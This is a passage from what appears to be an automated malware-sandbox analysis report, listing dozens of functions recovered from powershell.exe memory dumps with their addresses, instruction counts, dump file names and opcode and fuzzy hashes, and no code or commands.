                                                                                          • Opcode ID: 4d84ee277c9455e12a45617c0ae7fc4e69f283bc7565688f8616002fdf33bbaf
                                                                                          • Instruction ID: ac07a2eb5bab7c414735bdcc71629f20813b6d88c4ec4d1987f48b958ca2020a
                                                                                          • Opcode Fuzzy Hash: 4d84ee277c9455e12a45617c0ae7fc4e69f283bc7565688f8616002fdf33bbaf
                                                                                          • Instruction Fuzzy Hash: E3F028312097906FC7128769A8549BEBFE8DFCA231704099EE089D7792CEA44C45C771
                                                                                          Function 00BBBF18 Relevance: .0, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f205f0158632af73d2b230eaced06abd5d7c2c7def84c01f0c1498405f1d9e0e
                                                                                          • Instruction ID: b97b88adb8cdffaf5a94df060a4797b938ac21c9f7c38c729d971f59b8a88f88
                                                                                          • Opcode Fuzzy Hash: f205f0158632af73d2b230eaced06abd5d7c2c7def84c01f0c1498405f1d9e0e
                                                                                          • Instruction Fuzzy Hash: A1F06D323043665FD7108A6A9C54ABBBBEDEF89621B14407AF944C3352DFB0CC109AA0
                                                                                          Function 00BBDE81 Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d24c635a34c7f9674a0f7afdb022945a796be167fc7cc357ca40522e7eab8afd
                                                                                          • Instruction ID: 23e9de7ed748712b78e6f7848801a393cd85bb9f8fd1d26fcb098cc2a94af776
                                                                                          • Opcode Fuzzy Hash: d24c635a34c7f9674a0f7afdb022945a796be167fc7cc357ca40522e7eab8afd
                                                                                          • Instruction Fuzzy Hash: E901DB71B042449FCB08EB78D8558F9BBF1EF88320F1884A9E916D7351EB755C51CB61
                                                                                          Function 00B1D9A7 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87f2ae4eb0781506104e5de809598ead27c0dab580611654fb732d09e148c923
                                                                                          • Instruction ID: 7ae27b733ee2b2dc0c14fb9a808d5b2788191caa9a151b6f2cd8bdd2c27a2783
                                                                                          • Opcode Fuzzy Hash: 87f2ae4eb0781506104e5de809598ead27c0dab580611654fb732d09e148c923
                                                                                          • Instruction Fuzzy Hash: D6F04976600600AF9320CF0AC984C63FBEDEBC47B0319C09AE84A8B611C631EC41CAA0
                                                                                          Function 00BBC4C8 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a78e19394a54a20ccd75e7842407fa93e70f6e416d7db0d66a9799989b9c64c4
                                                                                          • Instruction ID: 71e7794f20290956bbd2bf20f6bbd5e528a128dd40d4d999b0b6d577dd9817c5
                                                                                          • Opcode Fuzzy Hash: a78e19394a54a20ccd75e7842407fa93e70f6e416d7db0d66a9799989b9c64c4
                                                                                          • Instruction Fuzzy Hash: 59F02BB11003066BC304DB28D484B9BB7E5EFC1724F54897DE10D8B700EF71AD458790
                                                                                          Function 00BB90E0 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 601041a6f79b746a98de8d44b117213f5701a5f63e2125c1133e78c22ff02e1f
                                                                                          • Instruction ID: a6d5b3bcabc99da07dbca8d043449184ce6f5f85019038ac66a20bdb93d35909
                                                                                          • Opcode Fuzzy Hash: 601041a6f79b746a98de8d44b117213f5701a5f63e2125c1133e78c22ff02e1f
                                                                                          • Instruction Fuzzy Hash: 37F024B5A04208ABE3006F28C0153EBBBE5EFC0314F60815AED1617386DF392952DB90
                                                                                          Function 00BBCB62 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4117bca480e00ff8cf955d51e6662c986069f5041b9eace8e50568bd18751649
                                                                                          • Instruction ID: d92abfa1d8b24481a2501cec148b545b5758df13fce1fcdc8ea9f93b67cf17df
                                                                                          • Opcode Fuzzy Hash: 4117bca480e00ff8cf955d51e6662c986069f5041b9eace8e50568bd18751649
                                                                                          • Instruction Fuzzy Hash: 0CF027702043816FC315A66DD88665EBFEADFC6260B68496EE109D7A11DF341D0697A0
                                                                                          Function 00B1D998 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1994953987.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_b1d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77ed706b29b6b7ea5dde4a3d067803fab11ff00eb96c3fe3b7d53df99432dd81
                                                                                          • Instruction ID: 5be7f09ef879b5c1df58205a94361b82b9500f03c6f7432941bbc94568e15938
                                                                                          • Opcode Fuzzy Hash: 77ed706b29b6b7ea5dde4a3d067803fab11ff00eb96c3fe3b7d53df99432dd81
                                                                                          • Instruction Fuzzy Hash: 79F0F975501A40AFD765CF06C985D63BBB9EB857A0B298499E84A8B712C631FC42CB60
                                                                                          Function 00BB9549 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9a4f3b46a21b8d8fbc62f1bb6b8f5919d5157a18b1dc9cab510acc936e6f99c4
                                                                                          • Instruction ID: 2eba23c46b64cfb7ba0a56016c8a6d0f795eda82748a3c3912bf83647e4ada84
                                                                                          • Opcode Fuzzy Hash: 9a4f3b46a21b8d8fbc62f1bb6b8f5919d5157a18b1dc9cab510acc936e6f99c4
                                                                                          • Instruction Fuzzy Hash: CEE092B27463592BC765276948002FABADEDF957A0B0800BAEB05C3252EDA1CC0283A1
                                                                                          Function 00BB7950 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c67380b45be305a92f67655cd8c285aa8754f5d16cb15de92f3e07bc850cbcf9
                                                                                          • Instruction ID: 0020b9513dd80e38be33ccec34f961479b7b92b27de60cf7ced8be972677cd59
                                                                                          • Opcode Fuzzy Hash: c67380b45be305a92f67655cd8c285aa8754f5d16cb15de92f3e07bc850cbcf9
                                                                                          • Instruction Fuzzy Hash: A5F0A071700614AFC7149B6AE884ABFBBE9EBC8771B00492DF10AD3740DF71AD4187A0
                                                                                          Function 00BBDFE0 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90b4f4fb8ac0884d42ce384ba72c9e9e2e9d70fceeeed64f6ecd122cf4511459
                                                                                          • Instruction ID: 1176fae462b71ca1f25792afce2986dd418c95edf1d749f5bed3e1002b8c78eb
                                                                                          • Opcode Fuzzy Hash: 90b4f4fb8ac0884d42ce384ba72c9e9e2e9d70fceeeed64f6ecd122cf4511459
                                                                                          • Instruction Fuzzy Hash: 03F05E343086418FC3019B28D8549A6BBF5EFCA31571910EAE595CF372DAA2DC11DB51
                                                                                          Function 00BBC4D8 Relevance: .0, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e109addab00f0d5d8e2a43e6a8a5727f0c5b76838343313d9aef1181b3a39983
                                                                                          • Instruction ID: d290de70fcb95c9c6960c6ddfb07bbbcf56d9b4bb0ba7622941e7909bd91973a
                                                                                          • Opcode Fuzzy Hash: e109addab00f0d5d8e2a43e6a8a5727f0c5b76838343313d9aef1181b3a39983
                                                                                          • Instruction Fuzzy Hash: 39F0A7B12002046BC304EB29D88499FBBD6EFC57647988ABEE10D8B711EE71AD4587E0
                                                                                          Function 00BB90F0 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ce738edb0ff8d0f58d5b67d606fbdfb4a94534a7212ea126fa5879c0027e594c
                                                                                          • Instruction ID: 008dabcde86db9b0d4f1f67d15260c6ebc0d59d829b0de76775f3699d674466b
                                                                                          • Opcode Fuzzy Hash: ce738edb0ff8d0f58d5b67d606fbdfb4a94534a7212ea126fa5879c0027e594c
                                                                                          • Instruction Fuzzy Hash: A0F027B56041089BD300BB74C0153EB77E6DFC0714F60816ED91947389DE392942CBD0
                                                                                          Function 00BB767F Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c3fdf0c366058c2b31a60ac68c404a33319969c67c7c7afa3fb0f69f93d4c88e
                                                                                          • Instruction ID: 38514cca5f57cec7f32a1103967cb3fda82b0c6b38324f777254739e32fa30d2
                                                                                          • Opcode Fuzzy Hash: c3fdf0c366058c2b31a60ac68c404a33319969c67c7c7afa3fb0f69f93d4c88e
                                                                                          • Instruction Fuzzy Hash: 8AF0A0763005048FCB009BAC99405EA77E2EFC975171541A9E50ACB316EF64CC028B90
                                                                                          Function 00BB8969 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 479f9c8f004ec895a6060e36907f64c76a200581470002a9729a6a28aa48ada0
                                                                                          • Instruction ID: 1f6d9a1dc36c94a9ba89a11853c54a30765b6907a7afb34befaed7e9f9ecebb0
                                                                                          • Opcode Fuzzy Hash: 479f9c8f004ec895a6060e36907f64c76a200581470002a9729a6a28aa48ada0
                                                                                          • Instruction Fuzzy Hash: 8EF0A77530C3555BC70B2774A81D2AE7BE5BF86724F040196EA1587382CF6D0A4583E5
                                                                                          Function 00BBDFF0 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: def0d25fede34ffa2a17e27f2f86aae5b85c367f37607175ed1a1533272b6359
                                                                                          • Instruction ID: f20228d76697bf39e09a27fa6e946d9c2650a7b04c5f13a8244e8db6366f12be
                                                                                          • Opcode Fuzzy Hash: def0d25fede34ffa2a17e27f2f86aae5b85c367f37607175ed1a1533272b6359
                                                                                          • Instruction Fuzzy Hash: F1E01A393005108F8310AB1DD498CAAB7FAEFCE72575914AAF549CF731DAA2EC01DB90
                                                                                          Function 00BB9160 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4b6fe94ba271f1982571c9c0acf70778a800e9b81c0de79592265fd6a22a29c8
                                                                                          • Instruction ID: b5c49bf31e95c31cb145923acb65e901bbaad86ea3b24d091133e4c745afa405
                                                                                          • Opcode Fuzzy Hash: 4b6fe94ba271f1982571c9c0acf70778a800e9b81c0de79592265fd6a22a29c8
                                                                                          • Instruction Fuzzy Hash: 2CF08CB0900705AFD760AF78D49939ABBE4FB00320F000829EA5EC3340DB386880CB90
                                                                                          Function 00BBDE30 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 455f8145b46eaa01fe3db3ddf863aea38f7ed97e095b0550d287d43e74565674
                                                                                          • Instruction ID: b7c59b7104df9dcf728db5cd05a90c437d629da78312b1f60dcba3bff3d4cd29
                                                                                          • Opcode Fuzzy Hash: 455f8145b46eaa01fe3db3ddf863aea38f7ed97e095b0550d287d43e74565674
                                                                                          • Instruction Fuzzy Hash: 6CE09B3120171667C315661DD901EDB7BDAEFC5B617144469F41587204EF689D0187F1
                                                                                          Function 00BBCB78 Relevance: .0, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8db913abb0b7ca46d14229e0b685f4fcfb25ed4e038961683f648f471420b5bf
                                                                                          • Instruction ID: 7f379e3c91eb1ecd5091e8daeb3ce00015eaa3209e646681e562b63bd906f86c
                                                                                          • Opcode Fuzzy Hash: 8db913abb0b7ca46d14229e0b685f4fcfb25ed4e038961683f648f471420b5bf
                                                                                          • Instruction Fuzzy Hash: A1E0D871200200278118B25EDC8556EBACEDFC52B0358486DE10E97610DE306D4153A0
                                                                                          Function 00BB9170 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3210ac43db5bdb8c9fd56cf4713ddb2528a94cc6818e1ba9142b8b507ee4dca9
                                                                                          • Instruction ID: e85a09befed0f44fd2907643a03ec3dd99558aae6a7d88d022fb9477241b0263
                                                                                          • Opcode Fuzzy Hash: 3210ac43db5bdb8c9fd56cf4713ddb2528a94cc6818e1ba9142b8b507ee4dca9
                                                                                          • Instruction Fuzzy Hash: 8AF0ED709043045BD764ABB9D89D79A7BE9FB44360F004869E65ED7340DB796980CB90
                                                                                          Function 00BB8978 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: de2bb46a650ec26ef628497782fbb420880b60a0dc77d0f400c4a820b8daf7a8
                                                                                          • Instruction ID: 9e07c8a06f908282a47694d4287f8212ea1ce88c05e53b23a7b262394a750595
                                                                                          • Opcode Fuzzy Hash: de2bb46a650ec26ef628497782fbb420880b60a0dc77d0f400c4a820b8daf7a8
                                                                                          • Instruction Fuzzy Hash: F9E0267530861847CB093774A80D2EE7AE6FBC5730F00012AE62A83381CF7C1A0183D5
                                                                                          Function 00BB9558 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 063988b8d37f732897105fec193eaf9e8a3bd40a60dfd45ff3995c41395187ba
                                                                                          • Instruction ID: a5bcfaa999e3b96d8745c965546aef777aa4b68ae033baacefe3ae6066aafb15
                                                                                          • Opcode Fuzzy Hash: 063988b8d37f732897105fec193eaf9e8a3bd40a60dfd45ff3995c41395187ba
                                                                                          • Instruction Fuzzy Hash: D1D05E927412251B85A436EA18416FBA9CFCAC56E070901BAAB05C3342ECC0DC0243F1
                                                                                          Function 00BBDE90 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: 8b84720c6c6d4c812e983de57b742a610ac4d37178cdc486e11501742405011d
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: 9DE08631B04014978B08969DD4504F9F7B5DFCC320F14847AD90AA7340DA725916C691
                                                                                          Function 00BBDE40 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 32e82ff4733414925b45a4ce4e40712503c8b855b42a26415d2ac1b6eefbad1f
                                                                                          • Instruction ID: aa552e0dea7d2aa6e114de94cf031be0f7d1e3108b150c3fdc04c3262e4efb32
                                                                                          • Opcode Fuzzy Hash: 32e82ff4733414925b45a4ce4e40712503c8b855b42a26415d2ac1b6eefbad1f
                                                                                          • Instruction Fuzzy Hash: 69E0C23230061857C625A62EA8108EF7BDBEFC8B7131444BEE029C7300FEA8DD0187E5
                                                                                          Function 00BBAF90 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ed6065e81fd42fc84e527eb8cfce3526a5ddaaf063461063ff3e220ee69e14db
                                                                                          • Instruction ID: b3a9d4727a0a11d98ab8c19fe2d91f9234708304282bd1caaa05d9746c1c2847
                                                                                          • Opcode Fuzzy Hash: ed6065e81fd42fc84e527eb8cfce3526a5ddaaf063461063ff3e220ee69e14db
                                                                                          • Instruction Fuzzy Hash: D2D0C276B0431727C705941EA4103A777DBDBC5310F188075B904C3201EEA18C124290
                                                                                          Function 00BBF608 Relevance: .0, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f3b243f707cb27029029402a39ba8440cbaac8b6f933a6992b5e12490d2d46d6
                                                                                          • Instruction ID: 7f5e9fcfdf3f9446c750bab170ad8e584c25ac68f041a0e5c3eb0653c9e4c827
                                                                                          • Opcode Fuzzy Hash: f3b243f707cb27029029402a39ba8440cbaac8b6f933a6992b5e12490d2d46d6
                                                                                          • Instruction Fuzzy Hash: 34E0ED70D041468FCB41EFB9C481569FFF0EF49210B2581EECC59EB215E3715911DB91
                                                                                          Function 00BBC990 Relevance: .0, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0079e6b4082bf7fea239bdd6b3fa8975130888f7d3be80567109ffebcfdddce9
                                                                                          • Instruction ID: ea43750cf5bc2ba79f017edcc3f5c45bf7e7934a3aa76fd73b3a3b175cdf645d
                                                                                          • Opcode Fuzzy Hash: 0079e6b4082bf7fea239bdd6b3fa8975130888f7d3be80567109ffebcfdddce9
                                                                                          • Instruction Fuzzy Hash: 23E086713081955BC305677CA8192657FE5EFC666170800BBE909C3381EA299C10C795
                                                                                          Function 00BB8800 Relevance: .0, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cfd64abe40de8c7d065d2c7ba5f5026f49f3f83505b806d3b42c810228a0be12
                                                                                          • Instruction ID: 8480c4a151ad07eeffa6e8625eafe08c3d2f63e855d035ad86bc13ac8e854a78
                                                                                          • Opcode Fuzzy Hash: cfd64abe40de8c7d065d2c7ba5f5026f49f3f83505b806d3b42c810228a0be12
                                                                                          • Instruction Fuzzy Hash: ACE04674A0820AAFCB04EFB4E4869AABBF5FB04305B004069ED1997780EB305891EBC1
                                                                                          Function 00BB8739 Relevance: .0, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a953bd234e6691bd5e39d0064a068eaface1842ddeeaf3a2a944d391e677f99e
                                                                                          • Instruction ID: fe32b13b4c35b571a46b8e4814397ccf48e4976a4b984b2ac38aad0f38873779
                                                                                          • Opcode Fuzzy Hash: a953bd234e6691bd5e39d0064a068eaface1842ddeeaf3a2a944d391e677f99e
                                                                                          • Instruction Fuzzy Hash: F7E04F3480520E9BCB08AF74E44B4ADBB74FE11301B100599E91252280EF301656CB80
                                                                                          Function 00BBC9A0 Relevance: .0, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6bd2d14d6a4feadc2624ebb9b72e5d373fdc1bd0bf080bff288595310ebc096
                                                                                          • Instruction ID: 1a2867ce4424e07be74af8e3742f5f7912455c7fc84d502bcf021c48d79f9083
                                                                                          • Opcode Fuzzy Hash: f6bd2d14d6a4feadc2624ebb9b72e5d373fdc1bd0bf080bff288595310ebc096
                                                                                          • Instruction Fuzzy Hash: 38D0C7753001146B8204677DB41A55977E9EBC9E71344007BF61DC3740DE659D0587D5
                                                                                          Function 00BBF618 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000014.00000002.1995580633.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_20_2_bb0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: e0a36e564d9a97763fdb23cc229022d172719c279afb2332a31627418d87bca4
